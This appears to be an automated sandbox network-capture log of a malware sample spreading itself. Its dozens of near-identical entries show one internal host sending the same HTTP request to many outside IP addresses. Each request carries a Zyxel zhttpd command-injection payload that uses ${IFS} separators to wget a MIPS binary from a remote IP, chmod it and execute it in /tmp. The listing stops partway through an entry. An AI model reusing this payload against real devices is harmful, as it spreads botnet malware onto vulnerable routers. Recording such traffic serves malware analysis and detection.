                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2901192.168.2.2344846181.151.49.89443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725256920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2902192.168.2.235679052.10.221.47443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725294113 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2903192.168.2.2354704195.145.138.234443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725347996 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2904192.168.2.2343854155.70.135.64443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725369930 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2905192.168.2.235631089.2.52.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725382090 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2906192.168.2.235887245.92.3.88443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725409031 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2907192.168.2.2341930123.177.54.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725430965 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2908192.168.2.233469235.222.87.222443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725487947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2909192.168.2.2347660136.195.131.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725492001 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2910192.168.2.233565467.66.26.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725519896 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2911192.168.2.2357916192.36.92.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725521088 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2912192.168.2.2333086172.214.205.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725599051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2913192.168.2.2360392123.195.226.220443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725599051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2914192.168.2.2337680184.55.210.169443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725599051 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2915192.168.2.233887057.44.184.209443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725627899 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2916192.168.2.2359914172.95.96.133443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725649118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2917192.168.2.235909039.59.189.164443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725691080 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2918192.168.2.2352292123.56.101.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725713015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2919192.168.2.2351078113.91.181.117443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725728989 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2920192.168.2.235690839.96.7.132443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725764990 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2921192.168.2.234709288.229.185.243443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725796938 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2922192.168.2.2332820111.214.204.172443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725853920 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2923192.168.2.2346632169.247.176.240443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725867033 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2924192.168.2.2334818147.146.189.166443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725878954 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2925192.168.2.23505889.213.243.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725919962 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2926192.168.2.2357262159.85.186.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725924015 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2927192.168.2.234119239.219.14.253443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.725946903 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2928192.168.2.2338178107.156.78.134443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726015091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2929192.168.2.2353612143.245.72.103443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726018906 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2930192.168.2.2339892200.201.136.51443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726035118 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2931192.168.2.233831445.6.17.230443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726098061 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2932192.168.2.2348852195.116.241.140443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726121902 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2933192.168.2.2358828122.182.100.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726126909 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2934192.168.2.2339080120.3.5.19443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726151943 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2935192.168.2.2335256106.177.96.161443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726172924 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2936192.168.2.2349682167.9.82.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726222992 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2937192.168.2.2352258128.68.200.90443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726241112 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2938192.168.2.233724289.7.40.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726259947 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2939192.168.2.233694671.110.84.97443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726285934 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2940192.168.2.234504650.27.162.165443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726317883 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2941192.168.2.2337030213.118.33.187443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726357937 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2942192.168.2.233472495.126.218.108443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726376057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2943192.168.2.2346648138.131.27.225443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726419926 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2944192.168.2.234539052.10.31.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726428986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2945192.168.2.2354342203.245.217.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726473093 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2946192.168.2.2335606180.60.91.188443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726499081 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2947192.168.2.2339432161.54.58.248443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726516008 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2948192.168.2.235883897.159.115.69443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726525068 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2949192.168.2.235978844.212.89.158443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726552963 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2950192.168.2.2349248169.24.62.194443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726598024 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2951192.168.2.2346780160.3.22.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726620913 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2952192.168.2.2354786159.84.190.186443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726658106 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2953192.168.2.23475201.127.83.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726973057 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2954192.168.2.235479834.147.153.114443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.726998091 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2955192.168.2.2352886152.200.255.58443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727025986 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2956192.168.2.2343818152.92.101.202443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727052927 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2957192.168.2.235871424.40.79.215443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727087975 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2958192.168.2.2341206125.148.254.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727106094 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2959192.168.2.23433645.53.188.217443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727149010 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2960192.168.2.2332858206.147.153.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727189064 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2961192.168.2.235187840.32.214.131443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727221966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2962192.168.2.234211267.44.61.250443
                                                TimestampBytes transferredDirectionData
                                                Jan 28, 2024 10:16:19.727221966 CET215OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/skyljnee.mips;${IFS}chmod${IFS}777${IFS}skyljnee.mips;${IFS}./skyljnee.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                2963192.168.2.2351754129.180.237.229443
                                                TimestampBytes transferredDirectionData
